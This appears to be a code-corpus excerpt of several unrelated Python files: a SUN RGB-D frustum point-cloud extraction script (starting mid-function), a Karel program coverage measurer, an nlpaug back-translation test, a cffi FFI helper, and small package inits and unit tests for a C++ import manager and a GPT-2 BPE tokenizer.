id_list, type_list, box2d_list, prob_list def read_det_pkl_file(det_file): classes = [ '__background__', 'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser', 'garbage_bin', 'lamp', 'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet' ] with open(det_file, 'rb') as f: dets = pickle.load(f) num_classes = len(dets) num_images = len(dets[0]) id_list = [] type_list = [] prob_list = [] box2d_list = [] for i in range(num_images): for c in range(1, num_classes): det = dets[c][i] for j in range(len(det)): id_list.append((i + 1)) type_list.append(classes[c]) prob_list.append(det[j][4]) box2d_list.append(det[j][:4]) return id_list, type_list, box2d_list, prob_list def extract_frustum_data(sunrgbd_dir, idx_filename, split, output_filename, type_whitelist, perturb_box2d=False, augmentX=1, with_down_sample=False): dataset = sunrgbd_object(sunrgbd_dir, split) data_idx_list = [int(line.rstrip()) for line in open(idx_filename)] id_list = [] # int number box2d_list = [] # [xmin,ymin,xmax,ymax] box3d_list = [] # (8,3) array in upright depth coord input_list = [] # channel number = 6, xyz,rgb in upright depth coord label_list = [] # 1 for roi object, 0 for clutter type_list = [] # string e.g. bed heading_list = [] # face of object angle, radius of clockwise angle from positive x axis in upright camera coord box3d_size_list = [] # array of l,w,h frustum_angle_list = [] # angle of 2d box center from pos x-axis (clockwise) img_coord_list = [] calib_K_list = [] calib_R_list = [] pos_cnt = 0 all_cnt = 0 for data_idx in data_idx_list: print('------------- ', data_idx) calib = dataset.get_calibration(data_idx) objects = dataset.get_label_objects(data_idx) pc_upright_depth = dataset.get_pointcloud(data_idx) pc_upright_camera = np.zeros_like(pc_upright_depth) pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3]) pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:] if with_down_sample: idx = down_sample(pc_upright_camera[:, :3], 0.01) # print(len(idx), len(pc_upright_camera)) pc_upright_camera = pc_upright_camera[idx] pc_upright_depth = pc_upright_depth[idx] # img = dataset.get_image(data_idx) # img_height, img_width, img_channel = img.shape pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth) for obj_idx in range(len(objects)): obj = objects[obj_idx] if obj.classname not in type_whitelist: continue # 2D BOX: Get pts rect backprojected box2d = obj.box2d for _ in range(augmentX): if perturb_box2d: xmin, ymin, xmax, ymax = random_shift_box2d(box2d) # print(xmin,ymin,xmax,ymax) else: xmin, ymin, xmax, ymax = box2d box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & ( pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin) coord_in_box_fov = pc_image_coord[box_fov_inds, :] pc_in_box_fov = pc_upright_camera[box_fov_inds, :] # Get frustum angle (according to center pixel in 2D BOX) box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0]) uvdepth = np.zeros((1, 3)) uvdepth[0, 0:2] = box2d_center uvdepth[0, 2] = 20 # some random depth box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth) # print('UVdepth, center in upright camera: ', uvdepth, box2d_center_upright_camera) frustum_angle = -1 * np.arctan2( box2d_center_upright_camera[0, 2], box2d_center_upright_camera[0, 0]) # angle as to positive x-axis as in the Zoox paper # print('Frustum angle: ', frustum_angle) # 3D BOX: Get pts velo in 3d box box3d_pts_2d, box3d_pts_3d = utils.compute_box_3d(obj, calib) box3d_pts_3d = calib.project_upright_depth_to_upright_camera(box3d_pts_3d) try: _, inds = extract_pc_in_box3d(pc_in_box_fov, box3d_pts_3d) except Exception as e: print(e) continue label = np.zeros((pc_in_box_fov.shape[0])) label[inds] = 1 box3d_size = np.array([2 * obj.l, 2 * obj.w, 2 * obj.h]) # Subsample points.. num_point = pc_in_box_fov.shape[0] if num_point > 2048: choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False) coord_in_box_fov = coord_in_box_fov[choice, :] pc_in_box_fov = pc_in_box_fov[choice, :] label = label[choice] # Reject object with too few points if np.sum(label) < 5: continue id_list.append(data_idx) box2d_list.append(np.array([xmin, ymin, xmax, ymax], dtype=np.float32)) box3d_list.append(box3d_pts_3d) input_list.append(pc_in_box_fov.astype(np.float32)) label_list.append(label.astype(np.bool)) type_list.append(obj.classname) heading_list.append(obj.heading_angle) box3d_size_list.append(box3d_size) frustum_angle_list.append(frustum_angle) img_coord_list.append(coord_in_box_fov.astype(np.float32)) calib_K_list.append(calib.K) calib_R_list.append(calib.Rtilt) # collect statistics pos_cnt += np.sum(label) all_cnt += pc_in_box_fov.shape[0] print('Average pos ratio: ', pos_cnt / float(all_cnt)) print('Average npoints: ', float(all_cnt) / len(id_list)) data_dict = { 'id': id_list, 'box2d': box2d_list, 'box3d': box3d_list, 'box3d_size': box3d_size_list, 'box3d_heading': heading_list, 'type': type_list, 'input': input_list, 'frustum_angle': frustum_angle_list, 'label': label_list, 'calib_K': calib_K_list, 'calib_R': calib_R_list, # 'image_coord': img_coord_list, } with open(output_filename, 'wb') as f: pickle.dump(data_dict, f, -1) print("save in {}".format(output_filename)) def extract_frustum_data_from_rgb_detection(sunrgbd_dir, det_file, split, output_filename, type_whitelist, valid_id_list=None, with_down_sample=False): dataset = sunrgbd_object(sunrgbd_dir, split) if det_file.split('.')[-1] == 'txt': det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_file(det_file) else: det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_pkl_file(det_file) cache_id = -1 cache = None id_list = [] type_list = [] box2d_list = [] prob_list = [] input_list = [] # channel number = 4, xyz,intensity in rect camera coord frustum_angle_list = [] # angle of 2d box center from pos x-axis img_coord_list = [] calib_K_list = [] calib_R_list = [] for det_idx in range(len(det_id_list)): data_idx = det_id_list[det_idx] if valid_id_list is not None and data_idx not in valid_id_list: continue if det_type_list[det_idx] not in type_whitelist: continue print('det idx: %d/%d, data idx: %d' % (det_idx, len(det_id_list), data_idx)) if cache_id != data_idx: calib = dataset.get_calibration(data_idx) pc_upright_depth = dataset.get_pointcloud(data_idx) pc_upright_camera = np.zeros_like(pc_upright_depth) pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3]) pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:] if with_down_sample: idx = down_sample(pc_upright_camera[:, :3], 0.01) # print(len(idx), len(pc_upright_camera)) pc_upright_camera = pc_upright_camera[idx] pc_upright_depth = pc_upright_depth[idx] # img = dataset.get_image(data_idx) # img_height, img_width, img_channel = img.shape pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth) cache = [calib, pc_upright_camera, pc_image_coord] cache_id = data_idx else: calib, pc_upright_camera, pc_image_coord = cache # 2D BOX: Get pts rect backprojected xmin, ymin, xmax, ymax = det_box2d_list[det_idx] box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & ( pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin) coord_in_box_fov = pc_image_coord[box_fov_inds, :] pc_in_box_fov = pc_upright_camera[box_fov_inds, :] # Get frustum angle (according to center pixel in 2D BOX) box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0]) uvdepth = np.zeros((1, 3)) uvdepth[0, 0:2] = box2d_center uvdepth[0, 2] = 20 # some random depth box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth) frustum_angle = -1 * np.arctan2( box2d_center_upright_camera[0, 2], box2d_center_upright_camera[0, 0]) # angle as to positive x-axis as in the Zoox paper # Subsample points.. num_point = pc_in_box_fov.shape[0] if num_point > 2048: choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False) coord_in_box_fov = coord_in_box_fov[choice, :] pc_in_box_fov = pc_in_box_fov[choice, :] # Pass objects that are too small if len(pc_in_box_fov) < 5: continue id_list.append(data_idx) type_list.append(det_type_list[det_idx]) box2d_list.append(det_box2d_list[det_idx]) prob_list.append(det_prob_list[det_idx]) input_list.append(pc_in_box_fov.astype(np.float32)) frustum_angle_list.append(frustum_angle) img_coord_list.append(coord_in_box_fov.astype(np.float32)) calib_K_list.append(calib.K) calib_R_list.append(calib.Rtilt) data_dict = { 'id': id_list, 'type': type_list, 'box2d': box2d_list, 'box2d_prob': prob_list, 'input': input_list, 'frustum_angle': frustum_angle_list, 'calib_K': calib_K_list, 'calib_R': calib_R_list, # 'image_coord': img_coord_list, } with open(output_filename, 'wb') as f: pickle.dump(data_dict, f, -1) print("save in {}".format(output_filename)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--gen_train', action='store_true', help='Generate train split frustum data with perturbed GT 2D boxes') parser.add_argument('--gen_val', action='store_true', help='Generate val split frustum data with GT 2D boxes') parser.add_argument('--gen_val_rgb_detection', action='store_true', help='Generate val split frustum data with RGB detection 2D boxes') parser.add_argument('--num_classes', default=10, type=int, help='19 or 10 categories, default 10') parser.add_argument('--save_dir', default='sunrgbd/data/pickle_data', type=str, help='directory to save data, default[sunrgbd/data/pickle_data]') parser.add_argument('--gen_avg_dim', action='store_true', help='get average dimension of each class') args = parser.parse_args() my_sunrgbd_dir = 'sunrgbd/mysunrgbd' # change if you do not set default path if args.num_classes == 10: type_whitelist = [ 'bed', 'table', 'sofa', 'chair', 'toilet', 'desk', 'dresser', 'night_stand', 'bookshelf', 'bathtub' ] elif args.num_classes == 19: type_whitelist = [ 'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser', 'garbage_bin', 'lamp', 'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet' ] else: assert False, 'please set correct num_classes' type_whitelist = set(type_whitelist) if args.gen_avg_dim: get_box3d_dim_statistics(my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt', type_whitelist) save_dir = args.save_dir if not os.path.exists(save_dir): os.makedirs(save_dir) if args.gen_train: extract_frustum_data(my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt', 'training', output_filename=os.path.join(save_dir, 'sunrgbd_train_aug5x.pickle'), type_whitelist=type_whitelist, perturb_box2d=True, augmentX=5, with_down_sample=False) if args.gen_val: extract_frustum_data(my_sunrgbd_dir, 'sunrgbd/image_sets/val.txt', 'training', output_filename=os.path.join(save_dir, 'sunrgbd_val.pickle'), type_whitelist=type_whitelist, perturb_box2d=False, augmentX=1, with_down_sample=False) if args.gen_val_rgb_detection: extract_frustum_data_from_rgb_detection(my_sunrgbd_dir, './sunrgbd/rgb_detections/sunrgbd_rgb_det_val_classes19_mAP50.2.txt', 'training', os.path.join(save_dir,'sunrgbd_rgb_det_val.pickle'), type_whitelist=type_whitelist)
program_synthesis/karel/dataset/coverage.py
kavigupta/program_synthesis
123
63720
from program_synthesis.karel.dataset import executor from program_synthesis.karel.dataset import parser_for_synthesis branch_types = {'if', 'ifElse', 'while'} stmt_types = {'move', 'turnLeft', 'turnRight', 'putMarker', 'pickMarker'} class CoverageMeasurer(object): def __init__(self, code): self.parser = parser_for_synthesis.KarelForSynthesisParser( build_tree=True) self.executor = executor.KarelExecutor() self.code = code tree = self.parser.parse(code) # Statement coverage: actions self.stmt_coverage = {span: 0 for span in self.parser.action_spans} # Branch coverage: if, ifelse, while self.branch_coverage = {(span, cond_value): 0 for span in self.parser.cond_block_spans for cond_value in (True, False)} def add(self, inp): out, trace = self.executor.execute( self.code, None, inp, record_trace=True) if not out: return False for event in trace.events: if event.type in branch_types: self.branch_coverage[event.span, event.cond_value] += 1 elif event.type in stmt_types: self.stmt_coverage[event.span] += 1 return True def uncovered(self): return (tuple(k for k, v in self.stmt_coverage.iteritems() if v == 0), tuple(k for k, v in self.branch_coverage.iteritems() if v == 0))
test/augmenter/word/test_back_translation.py
techthiyanes/nlpaug
3,121
63741
<gh_stars>1000+ import unittest import os import torch from dotenv import load_dotenv import nlpaug.augmenter.word as naw import nlpaug.model.lang_models as nml class TestBackTranslationAug(unittest.TestCase): @classmethod def setUpClass(cls): env_config_path = os.path.abspath(os.path.join( os.path.dirname(__file__), '..', '..', '..', '.env')) load_dotenv(env_config_path) cls.text = 'The quick brown fox jumps over the lazy dog' cls.texts = [ 'The quick brown fox jumps over the lazy dog', "Seeing all of the negative reviews for this movie, I figured that it could be yet another comic masterpiece that wasn't quite meant to be." ] cls.eng_model_names = [{ 'from_model_name': 'facebook/wmt19-en-de', 'to_model_name': 'facebook/wmt19-de-en', } ] def sample_test_case(self, device): # From English for model_name in self.eng_model_names: aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'], to_model_name=model_name['to_model_name'], device=device) augmented_text = aug.augment(self.text) aug.clear_cache() self.assertNotEqual(self.text, augmented_text) augmented_texts = aug.augment(self.texts) aug.clear_cache() for d, a in zip(self.texts, augmented_texts): self.assertNotEqual(d, a) if device == 'cpu': self.assertTrue(device == aug.model.get_device()) elif 'cuda' in device: self.assertTrue('cuda' in aug.model.get_device()) def test_back_translation(self): if torch.cuda.is_available(): self.sample_test_case('cuda') self.sample_test_case('cpu') def test_batch_size(self): model_name = self.eng_model_names[0] # 1 per batch aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'], to_model_name=model_name['to_model_name'], batch_size=1) aug_data = aug.augment(self.texts) self.assertEqual(len(aug_data), len(self.texts)) # batch size = input size aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'], to_model_name=model_name['to_model_name'], batch_size=len(self.texts)) aug_data = aug.augment(self.texts) self.assertEqual(len(aug_data), len(self.texts)) # batch size > input size aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'], to_model_name=model_name['to_model_name'], batch_size=len(self.texts)+1) aug_data = aug.augment(self.texts) self.assertEqual(len(aug_data), len(self.texts)) # input size > batch size aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'], to_model_name=model_name['to_model_name'], batch_size=2) aug_data = aug.augment(self.texts * 2) self.assertEqual(len(aug_data), len(self.texts)*2)
snaek/ffi.py
mitsuhiko/snaek
272
63742
import os import re import sys import cffi from ._compat import PY2 _directive_re = re.compile(r'^\s*#.*?$(?m)') def make_ffi(module_path, crate_path, cached_header_filename=None): """Creates a FFI instance for the given configuration.""" if cached_header_filename is not None and \ os.path.isfile(cached_header_filename): with open(cached_header_filename, 'rb') as f: header = f.read() if not PY2: header = header.decode('utf-8') else: from .bindgen import generate_header header = generate_header(crate_path) header = _directive_re.sub('', header) if os.environ.get('SNAEK_DEBUG_HEADER') == '1': sys.stderr.write('/* generated header for "%s" */\n' % module_path) sys.stderr.write(header) sys.stderr.write('\n') sys.stderr.flush() ffi = cffi.FFI() ffi.cdef(header) ffi.set_source(module_path, None) return ffi
google-api-client-generator/src/googleapis/codegen/cpp_import_manager_test.py
cclauss/discovery-artifact-manager
178
63751
#!/usr/bin/python2.7 # Copyright 2011 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for cpp_import_manager.""" __author__ = '<EMAIL> (<NAME>)' from google.apputils import basetest from googleapis.codegen.cpp_import_manager import CppImportManager class MockSchema(object): """Mock schema used in place of real schema objects.""" def __init__(self): self._template_values_dict = {} def SetTemplateValue(self, template_name, template_value): self._template_values_dict[template_name] = template_value def GetTemplateValue(self, template_name): return self._template_values_dict.get(template_name) class CppImportManagerTest(basetest.TestCase): def setUp(self): super(CppImportManagerTest, self).setUp() self.mock_schema = MockSchema() self.import_manager = CppImportManager(self.mock_schema) def testAddImportAndCommit(self): # Add a com.google import. com_google_import = '"base/integral_types.h"' self.assertTrue(self.import_manager.AddImport(com_google_import)) self.assertFalse(self.import_manager.platform_imports) self.assertFalse(self.import_manager.other_imports) self.assertTrue(self.import_manager.google_imports) # There are no platform imports for C++ platform_import = '<string>' self.assertTrue(self.import_manager.AddImport(platform_import)) self.assertTrue(self.import_manager.platform_imports) # Add a random thing other_import = '"Module.h"' self.import_manager.AddImport(other_import) # Assert the contents of google, other and java imports. expected_google_import_set = set() expected_google_import_set.add(com_google_import) sorted_expected_google_import_set = sorted(expected_google_import_set) self.assertEquals(sorted_expected_google_import_set, list(self.import_manager.google_imports)) self.assertEquals([other_import], list(self.import_manager.other_imports)) self.assertEquals([platform_import], list(self.import_manager.platform_imports)) # Assert the contents of class_name_to_qualified_name map. self.assertEquals( com_google_import, self.import_manager._class_name_to_qualified_name[com_google_import]) # Assert that commit import works. # The import_manager combines the platform and google imports together # but each segment is first sorted. expected_import_list = [ sorted([platform_import]) + sorted_expected_google_import_set, [other_import]] self.assertEquals( expected_import_list, self.mock_schema.GetTemplateValue('importManager').ImportLists()) if __name__ == '__main__': basetest.main()
pynacl/lib/__init__.py
cohortfsllc/cohort-cocl2-sandbox
2,151
63823
#!/usr/bin/python # Copyright (c) 2014 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # Unfortunately python does not have a good way to deal with module name # clashes. The easiest way to get around it is to use a layer of indirection. # For example, if pynacl.platform needs to use the python root platform module, # it should import lib instead and use lib.platform. # List name clashed modules here in alphabetical order import platform
autograd/numpy/__init__.py
gautam1858/autograd
6,119
63893
<filename>autograd/numpy/__init__.py<gh_stars>1000+ from __future__ import absolute_import from .numpy_wrapper import * from . import numpy_boxes from . import numpy_vspaces from . import numpy_vjps from . import numpy_jvps from . import linalg from . import fft from . import random
tests/test_bpe.py
Pimax1/keras-gpt-2
131
63902
import os from unittest import TestCase from keras_gpt_2 import get_bpe_from_files class TestBPE(TestCase): def test_encode_and_decode(self): current_path = os.path.dirname(os.path.abspath(__file__)) toy_checkpoint_path = os.path.join(current_path, 'toy_checkpoint') encoder_path = os.path.join(toy_checkpoint_path, 'encoder.json') vocab_path = os.path.join(toy_checkpoint_path, 'vocab.bpe') bpe = get_bpe_from_files(encoder_path, vocab_path) text = 'Power, give me more power!' indices = bpe.encode(text) self.assertEqual([13434, 11, 1577, 502, 517, 1176, 0], indices) self.assertEqual(text, bpe.decode(indices)) self.assertEqual(text, bpe.decode(bpe.encode(text)))